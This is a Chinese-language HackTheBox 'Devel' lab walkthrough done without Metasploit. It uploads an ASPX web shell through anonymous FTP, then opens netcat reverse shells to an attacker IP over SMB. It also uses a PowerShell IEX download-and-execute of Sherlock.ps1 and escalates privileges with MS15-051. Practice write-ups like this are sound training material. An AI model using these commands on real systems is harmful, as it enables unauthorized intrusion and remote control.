欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

hackthebox-Devel (考点:ftp/IIS/windows)不用msf

程序员文章站 2022-07-15 13:38:05
...

用msf做很快,很多人做这台机器写writeup也是用msf做的。但针对oscp,本篇文章不用msf

nmap
hackthebox-Devel (考点:ftp/IIS/windows)不用msf

看到21ftp要想到进去看看,找敏感文件

匿名anonymous进入
hackthebox-Devel (考点:ftp/IIS/windows)不用msf
也没啥。但是你也有可能看到一些shell已经在里面了,那是因为之前有人做的留下的。开启机器,不一定会全部重置,会有前人的痕迹。我发现是这样。

可以看到IIS的图片。

再看80

扫描,没什么发现hackthebox-Devel (考点:ftp/IIS/windows)不用msf
打开80网页10.10.10.5,发现也就是ftp里的图片,说明往ftp里送东西,可以显示在80网页上

OK、这里要知道IIS,得用asp/aspx文件

locate cmd.aspx

网页版cmd,随便用一个。
在ftp里输入 put cmd.aspx 放进去。
或者通过在文件夹底部的输入框里输入ftp://10.10.10.5。以文件夹形式看ftp,在这里直接把文件复制粘贴进去。
hackthebox-Devel (考点:ftp/IIS/windows)不用msf
hackthebox-Devel (考点:ftp/IIS/windows)不用msf

再在网页端执行命令。一切OK。证明有效。
hackthebox-Devel (考点:ftp/IIS/windows)不用msf
那么在cmd里执行弹shell的命令到我本机。这样我就拿shell了

方法有很多的。
因为是Windows。所以我习惯用smb服务用来传送文件&执行了。工具
先把nc.exe放好到共享的文件夹里 工具下载
打开服务

python smbserver.py Share '/root/exp'

在网页cmd里执行\\10.10.14.57\share\nc.exe -e cmd.exe 10.10.14.57 4445
另外本地监听,收到

hackthebox-Devel (考点:ftp/IIS/windows)不用msf

当然是个低权限。
可以用powershell的powerup.ps1和夏洛克ps1来寻找提权漏洞。操作方法这些就不细说了,以前的文章说了很多。

powershell IEX(New-Object Net.Webclient).downloadString('http://10.10.14.57/Sherlock.ps1')

hackthebox-Devel (考点:ftp/IIS/windows)不用msf

有很多可以提,这次我选择MS15-051,因为昨天写的bastard才用过,可以参考
bastard

但也有些不同,因为systeminfo查看,这台机器不是bastard的64位,所以两个文件要换32位的

本来想用bastard那样的方法,直接简单

\\10.10.14.57\share\ms15-051.exe "\\10.10.14.57\share\nc.exe -e cmd 10.10.14.57 443"

但是一直不管用,虽然显示成功执行了,但就是收不到shell。搞不懂

后来我把这俩文件拷到靶机里。

copy \\10.10.14.57\share\ms15-051.exe
copy \\10.10.14.57\share\nc.exe

最后

c:\Windows\Temp\ms15-051.exe "c:\Windows\Temp\nc.exe -e cmd 10.10.14.57 8080"

成功收到。。。搞定
hackthebox-Devel (考点:ftp/IIS/windows)不用msf